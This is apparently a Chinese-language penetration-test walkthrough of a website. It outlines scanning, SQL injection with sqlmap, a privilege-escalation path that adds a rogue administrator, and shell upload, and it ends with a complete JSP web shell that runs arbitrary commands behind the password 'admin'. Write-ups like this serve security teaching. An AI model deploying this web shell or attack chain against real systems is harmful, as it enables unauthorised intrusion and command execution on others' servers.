流程:
1. 信息收集:
- 获取站点后,进行信息收集,扫描目录,查找敏感信息。
2. BurpSuite流程检测:
- 使用BurpSuite打开网站,执行流程检测,寻找可能存在的漏洞。
3. 文件上传漏洞利用:
- 发现站点存在文件上传接口,尝试上传shell以利用漏洞。
4. 越权漏洞探测:
- 检查站点中的链接,发现一处越权漏洞,测试水平越权和SQL注入可能性。
5. Spring框架漏洞扫描:
- 利用Spring框架相关接口路由字典扫描,发现druid登录页面,但未找到未授权访问或弱口令漏洞。
6. Swagger漏洞发现:
- 在Swagger中发现一处注入和敏感信息泄露漏洞。
7. 敏感信息泄露漏洞利用:
- 利用漏洞泄露敏感信息,发现越权问题。
8. SQL注入攻击:
- 利用猜测的参数名进行SQL注入攻击,使用sqlmap进行测试。
9. 越权添加用户:
- 通过数据库翻查未找到管理员账号密码,但成功找到越权添加/编辑用户接口,添加新管理员账号并登录。
10. 任意文件上传漏洞利用:
- 利用文件上传漏洞,通过修改项目键值进行跨目录上传shell。
11. 疑问解答:
- 针对上传shell问题,尝试使用冰蝎、哥斯拉的马失败,更换带密码回显的jsp马成功。疑问解答涉及Cookie问题。
<%
if("admin".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>点击收藏 | 1
© 版权声明
THE END
暂无评论内容